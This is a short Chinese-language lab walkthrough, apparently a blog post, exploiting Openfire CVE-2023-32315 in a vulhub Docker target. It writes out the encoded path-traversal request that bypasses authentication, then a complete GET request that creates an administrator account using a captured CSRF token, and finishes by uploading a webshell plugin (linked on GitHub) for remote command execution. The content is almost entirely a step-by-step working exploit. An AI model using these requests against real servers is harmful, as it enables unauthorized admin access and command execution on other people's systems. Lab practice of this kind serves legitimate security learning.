一、开启vulhub环境
docker-compose up -d 启动
docker ps 查看开放的端口
二、访问靶机IP 9090端口
1、利用bp,抓取当前页面的包,并修改get请求如下
/setup/setup-s/%u002e%u002e/%u002e%u002e/user-groups.jsp
获取到JSESSIONID和csrf的值
2、拿到JSESSIONID和CSRF,对着系统发送如下GET请求(POC),注册用户
/setup/setup-s/%u002e%u002e/%u002e%u002e/user-create.jsp?csrf=9jtBfDEZU8yVVFD&username=test123&name=&email=&password=test123&passwordConfirm=test123&isadmin=on&create=%E5%88%9B%E5%BB%BA%E7%94%A8%E6%88%B7
注意以上红色框里的内容,要与之前获取的数据一致
3、此时,利用创建的新用户登录
登录成功
三、获取RCE
1、在以下位置上传webshell插件,并启用
https://github.com/tangxiaofeng7/CVE-2023-32315-Openfire-Bypass 插件地址
2、在Server Settings处使用webshell
至此,命令执行完成。
下期再见,家人们。